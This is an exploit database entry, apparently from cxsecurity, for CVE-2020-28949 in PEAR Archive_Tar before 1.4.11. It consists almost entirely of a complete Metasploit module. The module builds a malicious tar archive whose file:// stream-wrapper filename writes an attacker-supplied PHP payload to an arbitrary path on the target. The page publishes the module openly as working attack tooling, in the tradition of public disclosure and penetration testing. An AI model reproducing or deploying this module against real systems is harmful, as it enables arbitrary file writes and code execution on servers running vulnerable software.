PEAR Archive_Tar Arbitrary File Write

2021.01.31
Credit: gwillcox-r7
Risk: High
Local: No
Remote: Yes
CWE: N/A

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'rex/tar' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT def initialize(info = {}) super( update_info( info, 'Name' => 'PEAR Archive_Tar < 1.4.11 Arbitrary File Write', 'Description' => %q{ This module takes advantages of Archive_Tar < 1.4.11's lack of validation of file stream wrappers contained within filenames to write an arbitrary file containing user controlled content to an arbitrary file on disk. Note that the file will be written to disk with the permissions of the user that PHP is running as, so it may not be possible to overwrite some files if the PHP user is not appropriately privileged. }, 'License' => MSF_LICENSE, 'Author' => [ 'gwillcox-r7', # Metasploit module 'xorathustra', # Original advisory and PoC ], 'References' => [ ['URL', 'https://github.com/pear/Archive_Tar/issues/33'], ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28949'], ['CVE', '2020-28949'] ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', 'DisablePayloadHandler' => true }, 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Targets' => [ ['Archive_Tar < 1.4.11', {}] ], 'Privileged' => false, 'DisclosureDate' => '2020-11-17' ) ) register_options([ OptString.new('FILEPATH', [true, 'The full path to the file to write on the target.', '/tmp/msf.php']) ]) end def exploit # Create malicious tar archive tarfile = StringIO.new Rex::Tar::Writer.new tarfile do |tar| tar.add_file "file://#{datastore['FILEPATH']}", 0o644 do |io| io.write payload.encoded end end tarfile.rewind file_buffer = tarfile.read print_status "Writing file: #{datastore['FILENAME']} (#{file_buffer.length} bytes) ..." file_create file_buffer end end


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top